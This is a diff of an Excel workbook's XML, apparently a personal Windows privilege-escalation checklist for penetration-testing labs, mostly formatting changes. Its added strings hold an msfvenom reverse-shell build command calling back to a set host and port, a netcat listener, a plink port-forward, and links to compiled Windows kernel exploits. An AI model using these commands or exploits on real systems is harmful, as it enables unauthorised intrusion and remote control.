--- a/Windows_Priv_checklist.xlsx
+++ b/Windows_Priv_checklist.xlsx
@@ -1,19 +1,20 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22827"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="23001"/>
   <workbookPr defaultThemeVersion="166925"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\ashwi\Documents\Cheatsheets\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{3DD26AAA-9B1E-41B1-8668-B1CD790EC5D4}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D58D7367-98D6-423D-9B95-3FDAF7597B8D}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11310" xr2:uid="{6963620D-4442-470F-924A-CBD2F3504823}"/>
   </bookViews>
   <sheets>
-    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
+    <sheet name="CheckList" sheetId="1" r:id="rId1"/>
+    <sheet name="KE" sheetId="2" r:id="rId2"/>
   </sheets>
   <calcPr calcId="191029"/>
   <extLst>
@@ -31,7 +32,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="276" uniqueCount="248">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="305" uniqueCount="269">
   <si>
     <t>Checks</t>
   </si>
@@ -668,9 +669,6 @@
     <t>plink.exe &lt;user&gt;@&lt;kali&gt; -R &lt;kaliport&gt;:&lt;target-IP&gt;:&lt;target-port&gt;</t>
   </si>
   <si>
-    <t>Look the command and subsuite for port forward</t>
-  </si>
-  <si>
     <t>Install application will be get exploit by port forward like symentac</t>
   </si>
   <si>
@@ -801,13 +799,7 @@
     <t>.\Seatbelt.exe all</t>
   </si>
   <si>
-    <t>preferred</t>
-  </si>
-  <si>
     <t>netstat -aton</t>
-  </si>
-  <si>
-    <t>python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet</t>
   </si>
   <si>
     <t>wes.py</t>
@@ -843,13 +835,86 @@
   </si>
   <si>
     <t>Meterpreter Shell</t>
+  </si>
+  <si>
+    <t>python2 windows-exploit-suggester.py --database 2020-04-19-mssb.xls --systeminfo /root/HTB/Bastrad/sys.txt --quiet</t>
+  </si>
+  <si>
+    <t>MS10-059.exe</t>
+  </si>
+  <si>
+    <t>OS</t>
+  </si>
+  <si>
+    <t>Exploit</t>
+  </si>
+  <si>
+    <t>win Serv 2008</t>
+  </si>
+  <si>
+    <t>Results</t>
+  </si>
+  <si>
+    <t>https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled</t>
+  </si>
+  <si>
+    <t>win Serv 2012</t>
+  </si>
+  <si>
+    <t>MS16-032</t>
+  </si>
+  <si>
+    <t>Excellent</t>
+  </si>
+  <si>
+    <t>MS14-058</t>
+  </si>
+  <si>
+    <t>ref</t>
+  </si>
+  <si>
+    <t>https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS14-058/CVE-2014-4113-Exploit.rar</t>
+  </si>
+  <si>
+    <t>MS15-051</t>
+  </si>
+  <si>
+    <t>https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip</t>
+  </si>
+  <si>
+    <t>https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032/x64</t>
+  </si>
+  <si>
+    <t>RDP Access, MSf</t>
+  </si>
+  <si>
+    <t>Preferred</t>
+  </si>
+  <si>
+    <t>Pwn shell</t>
+  </si>
+  <si>
+    <t>Best for taking powershell, nc.exe is not worth</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Msf rev shell </t>
+  </si>
+  <si>
+    <t>Look the command and subsuite for port forward, Symentac endpoint</t>
+  </si>
+  <si>
+    <t>non staged payload - Recommended caught via nc -lnvp 8443</t>
+  </si>
+  <si>
+    <t>msfvenom -p windows/shell_reverse_tcp
+LHOST=192.168.1.11 LPORT=53 -f exe -o reverse.exe</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
 <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
-  <fonts count="19" x14ac:knownFonts="1">
+  <fonts count="20" x14ac:knownFonts="1">
     <font>
       <sz val="11"/>
       <color theme="1"/>
@@ -991,6 +1056,13 @@
       <family val="2"/>
       <scheme val="minor"/>
     </font>
+    <font>
+      <sz val="12"/>
+      <color theme="2" tint="-0.89999084444715716"/>
+      <name val="Calibri"/>
+      <family val="2"/>
+      <scheme val="minor"/>
+    </font>
   </fonts>
   <fills count="5">
     <fill>
@@ -1018,7 +1090,7 @@
       </patternFill>
     </fill>
   </fills>
-  <borders count="22">
+  <borders count="24">
     <border>
       <left/>
       <right/>
@@ -1039,15 +1111,6 @@
     </border>
     <border>
       <left/>
-      <right/>
-      <top style="medium">
-        <color indexed="64"/>
-      </top>
-      <bottom/>
-      <diagonal/>
-    </border>
-    <border>
-      <left/>
       <right style="medium">
         <color indexed="64"/>
       </right>
@@ -1249,12 +1312,53 @@
       </bottom>
       <diagonal/>
     </border>
+    <border>
+      <left style="thin">
+        <color indexed="64"/>
+      </left>
+      <right style="thin">
+        <color indexed="64"/>
+      </right>
+      <top style="thin">
+        <color indexed="64"/>
+      </top>
+      <bottom style="thin">
+        <color indexed="64"/>
+      </bottom>
+      <diagonal/>
+    </border>
+    <border>
+      <left style="medium">
+        <color indexed="64"/>
+      </left>
+      <right/>
+      <top style="medium">
+        <color indexed="64"/>
+      </top>
+      <bottom style="thin">
+        <color indexed="64"/>
+      </bottom>
+      <diagonal/>
+    </border>
+    <border>
+      <left/>
+      <right style="thin">
+        <color indexed="64"/>
+      </right>
+      <top style="medium">
+        <color indexed="64"/>
+      </top>
+      <bottom style="thin">
+        <color indexed="64"/>
+      </bottom>
+      <diagonal/>
+    </border>
   </borders>
   <cellStyleXfs count="2">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
     <xf numFmtId="0" fontId="1" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
   </cellStyleXfs>
-  <cellXfs count="73">
+  <cellXfs count="78">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment vertical="center"/>
@@ -1275,58 +1379,58 @@
     <xf numFmtId="0" fontId="3" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
       <alignment horizontal="center" vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment vertical="center"/>
     </xf>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment vertical="center" wrapText="1"/>
     </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center"/>
+    </xf>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="6" xfId="0" applyBorder="1" applyAlignment="1">
-      <alignment vertical="center"/>
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
     </xf>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="7" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="1" fillId="0" borderId="2" xfId="1" applyBorder="1" applyAlignment="1">
       <alignment vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1">
-      <alignment vertical="center" wrapText="1"/>
+    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="5" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center"/>
     </xf>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="8" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="1" fillId="0" borderId="3" xfId="1" applyBorder="1" applyAlignment="1">
-      <alignment vertical="center" wrapText="1"/>
-    </xf>
-    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="5" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
-      <alignment vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="5" fillId="0" borderId="6" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
-      <alignment vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
-      <alignment vertical="center"/>
-    </xf>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="9" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment vertical="center" wrapText="1"/>
     </xf>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="10" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="11" xfId="0" applyBorder="1" applyAlignment="1">
-      <alignment vertical="center" wrapText="1"/>
-    </xf>
     <xf numFmtId="0" fontId="10" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
       <alignment vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="10" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="10" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
       <alignment vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="10" fillId="0" borderId="6" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="10" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
       <alignment vertical="center"/>
     </xf>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
@@ -1335,12 +1439,12 @@
     <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="9" xfId="0" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center"/>
+    </xf>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="10" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="11" xfId="0" applyBorder="1" applyAlignment="1">
-      <alignment vertical="center"/>
-    </xf>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment vertical="center"/>
     </xf>
@@ -1355,33 +1459,33 @@
     </xf>
     <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1" applyBorder="1"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1"/>
-    <xf numFmtId="0" fontId="3" fillId="3" borderId="12" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="3" fillId="3" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="11" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="11" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
     <xf numFmtId="0" fontId="11" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="11" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="left" vertical="center" wrapText="1"/>
-    </xf>
-    <xf numFmtId="0" fontId="11" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="left" vertical="center" wrapText="1"/>
-    </xf>
-    <xf numFmtId="0" fontId="7" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="7" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
       <alignment vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="7" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="7" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
       <alignment vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="1" fillId="0" borderId="11" xfId="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="1" fillId="0" borderId="10" xfId="1" applyBorder="1" applyAlignment="1">
       <alignment vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="1" fillId="0" borderId="11" xfId="1" applyBorder="1" applyAlignment="1">
-      <alignment vertical="center" wrapText="1"/>
     </xf>
     <xf numFmtId="0" fontId="1" fillId="0" borderId="10" xfId="1" applyBorder="1" applyAlignment="1">
       <alignment vertical="center" wrapText="1"/>
     </xf>
+    <xf numFmtId="0" fontId="1" fillId="0" borderId="9" xfId="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
     <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="right" vertical="center"/>
     </xf>
@@ -1397,67 +1501,76 @@
     <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="15" fillId="2" borderId="14" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="15" fillId="2" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="3" fillId="2" borderId="14" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="14" fillId="2" borderId="14" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="14" fillId="2" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="15" fillId="2" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="15" fillId="2" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="16" fillId="2" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="16" fillId="2" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="3" fillId="2" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="3" fillId="2" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="14" fillId="2" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="14" fillId="2" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="3" fillId="2" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="3" fillId="2" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="17" fillId="2" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="17" fillId="2" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="17" fillId="2" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="17" fillId="2" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="18" fillId="2" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="18" fillId="2" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="18" fillId="2" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="18" fillId="2" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="21" xfId="0" applyBorder="1"/>
+    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="1"/>
+    <xf numFmtId="0" fontId="1" fillId="0" borderId="4" xfId="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1"/>
+    <xf numFmtId="0" fontId="19" fillId="2" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="8" xfId="0" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="7" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
     <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="1" applyFont="1" applyFill="1"/>
     <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
-    <xf numFmtId="0" fontId="4" fillId="2" borderId="12" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="4" fillId="2" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="6" fillId="2" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="6" fillId="2" borderId="12" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
     <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="4" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="left" vertical="center"/>
-    </xf>
     <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center" wrapText="1"/>
+    <xf numFmtId="0" fontId="4" fillId="0" borderId="22" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="4" fillId="0" borderId="23" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
     <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
@@ -1777,10 +1890,10 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{C981E414-9B54-4DB2-AC86-B1519AF622DB}">
-  <dimension ref="A2:J348"/>
+  <dimension ref="A2:J350"/>
   <sheetViews>
-    <sheetView showGridLines="0" tabSelected="1" zoomScaleNormal="100" workbookViewId="0">
-      <selection activeCell="C184" sqref="C184"/>
+    <sheetView showGridLines="0" tabSelected="1" topLeftCell="A170" zoomScaleNormal="100" workbookViewId="0">
+      <selection activeCell="C178" sqref="C178"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -1792,114 +1905,117 @@
   </cols>
   <sheetData>
     <row r="2" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="A2" s="52" t="s">
+      <c r="A2" s="51" t="s">
+        <v>231</v>
+      </c>
+      <c r="B2" s="52" t="s">
         <v>232</v>
       </c>
-      <c r="B2" s="53" t="s">
-        <v>233</v>
-      </c>
-      <c r="C2" s="54" t="s">
-        <v>233</v>
-      </c>
-      <c r="D2" s="55"/>
+      <c r="C2" s="53" t="s">
+        <v>232</v>
+      </c>
+      <c r="D2" s="54"/>
     </row>
     <row r="3" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="A3" s="56" t="s">
+      <c r="A3" s="55" t="s">
+        <v>229</v>
+      </c>
+      <c r="B3" s="47" t="s">
         <v>230</v>
       </c>
-      <c r="B3" s="47" t="s">
-        <v>231</v>
-      </c>
       <c r="C3" s="49"/>
-      <c r="D3" s="57"/>
+      <c r="D3" s="56"/>
     </row>
     <row r="4" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="A4" s="60" t="s">
+      <c r="A4" s="59" t="s">
+        <v>225</v>
+      </c>
+      <c r="B4" s="47" t="s">
         <v>226</v>
       </c>
-      <c r="B4" s="47" t="s">
+      <c r="C4" s="48" t="s">
         <v>227</v>
       </c>
-      <c r="C4" s="48" t="s">
+      <c r="D4" s="57" t="s">
+        <v>262</v>
+      </c>
+    </row>
+    <row r="5" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="A5" s="59" t="s">
+        <v>224</v>
+      </c>
+      <c r="B5" s="47" t="s">
         <v>228</v>
       </c>
-      <c r="D4" s="58" t="s">
-        <v>234</v>
-      </c>
-    </row>
-    <row r="5" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="A5" s="61" t="s">
-        <v>225</v>
-      </c>
-      <c r="B5" s="50" t="s">
-        <v>229</v>
-      </c>
-      <c r="C5" s="51"/>
-      <c r="D5" s="59" t="s">
-        <v>234</v>
-      </c>
-    </row>
-    <row r="7" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="A7" s="6" t="s">
+      <c r="C5" s="49"/>
+      <c r="D5" s="57" t="s">
+        <v>262</v>
+      </c>
+    </row>
+    <row r="6" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="A6" s="60" t="s">
+        <v>263</v>
+      </c>
+      <c r="B6" s="50" t="s">
+        <v>265</v>
+      </c>
+      <c r="C6" s="65" t="s">
+        <v>264</v>
+      </c>
+      <c r="D6" s="58" t="s">
+        <v>262</v>
+      </c>
+    </row>
+    <row r="8" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="A8" s="6" t="s">
         <v>1</v>
       </c>
-      <c r="B7" s="6" t="s">
+      <c r="B8" s="6" t="s">
         <v>0</v>
       </c>
-      <c r="C7" s="7" t="s">
+      <c r="C8" s="7" t="s">
         <v>5</v>
       </c>
-      <c r="D7" s="7" t="s">
+      <c r="D8" s="7" t="s">
         <v>57</v>
       </c>
     </row>
-    <row r="8" spans="1:5" s="4" customFormat="1" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A8" s="3"/>
-      <c r="B8" s="3"/>
-      <c r="C8" s="32"/>
-      <c r="D8" s="32"/>
-      <c r="E8" s="34"/>
-    </row>
     <row r="9" spans="1:5" s="4" customFormat="1" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A9" s="16" t="s">
-        <v>2</v>
-      </c>
-      <c r="B9" s="66" t="s">
-        <v>135</v>
-      </c>
-      <c r="C9" s="67"/>
+      <c r="A9" s="3"/>
+      <c r="B9" s="3"/>
+      <c r="C9" s="32"/>
       <c r="D9" s="32"/>
       <c r="E9" s="34"/>
     </row>
-    <row r="10" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="A10" s="8"/>
-      <c r="B10" s="23" t="s">
-        <v>47</v>
-      </c>
-      <c r="C10" s="20" t="s">
-        <v>46</v>
-      </c>
-      <c r="D10" s="12"/>
-      <c r="E10" s="35"/>
